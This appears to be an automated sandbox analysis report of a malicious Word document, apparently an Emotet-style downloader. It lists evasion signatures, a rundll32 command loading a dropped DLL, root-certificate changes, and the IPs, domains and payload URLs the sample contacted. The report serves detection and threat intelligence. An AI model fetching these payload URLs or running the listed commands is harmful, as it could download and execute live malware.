Source: WMIC.exe, 00000002.00000003.2138874770.00000000033AB000.00000004.00000001.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]

Anti Debugging:

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_70936CF0 GetUserNameW,MessageBoxW,GetLastError,CreateFileA,DebugBreak,FlushFileBuffers,FreeEnvironmentStringsA,GetConsoleOutputCP,GetEnvironmentStrings,GetLocaleInfoA,GetStartupInfoA,GetStringTypeA,HeapValidate,IsBadReadPtr,LCMapStringA,LoadLibraryA,OutputDebugStringA, 6_2_70936CF0

HIPS / PFW / Operating System Protection Evasion:

Document contains VBA stomped code (only p-code) potentially bypassing AV detection
Source: SecuriteInfo.com.VB.Heur.EmoDldr.32.1ED8B2A0.Gen.1653.doc OLE indicator, VBA stomping: true
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\wbem\WMIC.exe Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:/Windows/Temp//5xta3.dll DllRegisterServer Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:/Windows/Temp//5xta3.dll DllRegisterServer Jump to behavior
Source: WMIC.exe, 00000002.00000002.2385275903.0000000000800000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2385134307.0000000000830000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2385278214.0000000000CE0000.00000002.00000001.sdmp Binary or memory string: Program Manager
Source: WMIC.exe, 00000002.00000002.2385275903.0000000000800000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2385134307.0000000000830000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2385278214.0000000000CE0000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: WMIC.exe, 00000002.00000002.2385275903.0000000000800000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2385134307.0000000000830000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2385278214.0000000000CE0000.00000002.00000001.sdmp Binary or memory string: !Progman

Language, Device and Operating System Detection:

Contains functionality to query locales information (e.g. system language)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetUserNameW,MessageBoxW,GetLastError,CreateFileA,DebugBreak,FlushFileBuffers,FreeEnvironmentStringsA,GetConsoleOutputCP,GetEnvironmentStrings,GetLocaleInfoA,GetStartupInfoA,GetStringTypeA,HeapValidate,IsBadReadPtr,LCMapStringA,LoadLibraryA,OutputDebugStringA, 6_2_70936CF0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_70936CF0 GetUserNameW,MessageBoxW,GetLastError,CreateFileA,DebugBreak,FlushFileBuffers,FreeEnvironmentStringsA,GetConsoleOutputCP,GetEnvironmentStrings,GetLocaleInfoA,GetStartupInfoA,GetStringTypeA,HeapValidate,IsBadReadPtr,LCMapStringA,LoadLibraryA,OutputDebugStringA, 6_2_70936CF0
Source: C:\Windows\System32\wbem\WMIC.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings:

Adds / modifies Windows certificates
Source: C:\Windows\System32\wbem\WMIC.exe Registry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 Blob Jump to behavior

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
Behavior Graph (ID: 333829, Sample: SecuriteInfo.com.VB.Heur.Em..., Startdate: 24/12/2020, Architecture: WINDOWS, Score: 92). Signatures on the sample node: Multi AV Scanner detection for submitted file; Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros); Document contains an embedded macro with GUI obfuscation; 8 other signatures. The sample starts WMIC.exe and WINWORD.EXE. WMIC.exe contacts sypher.biz (94.130.162.223, ports 49170 and 80, HETZNER-ASDE, Germany), wellnessway.co.za (41.185.8.141, ports 443 and 49167, GridhostZA, South Africa) and 5 other IPs or domains; drops C:\Windows\Temp\5xta3.dll (PE32) and C:\Users\user\AppData\...\q3H69D5AKRPk[1].php (PE32); and starts rundll32.exe, which in turn starts a second rundll32.exe.
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country ASN ASN Name Malicious
94.130.162.223 unknown Germany 24940 HETZNER-ASDE false
98.142.105.18 unknown United States 33182 DIMENOCUS false
35.238.218.46 unknown United States 15169 GOOGLEUS false
41.185.8.141 unknown South Africa 36943 GridhostZA false
104.18.56.1 unknown United States 13335 CLOUDFLARENETUS false
160.153.133.217 unknown United States 21501 GODADDY-AMSDE false

Contacted Domains

Name IP Active
penniesforsense.com 35.238.218.46 true
sypher.biz 94.130.162.223 true
gesdoc.fda.com.pe 98.142.105.18 true
cnkmovil.com 104.18.56.1 true
wellnessway.co.za 41.185.8.141 true
explainervideoz.com 160.153.133.217 true
www.wellnessway.co.za unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://sypher.biz/nx3jY0Jl.php false
  • Avira URL Cloud: safe
unknown
http://penniesforsense.com/wp-content/plugins/penci-pennews-review/inc/templates/q3H69D5AKRPk.php false
  • Avira URL Cloud: safe
unknown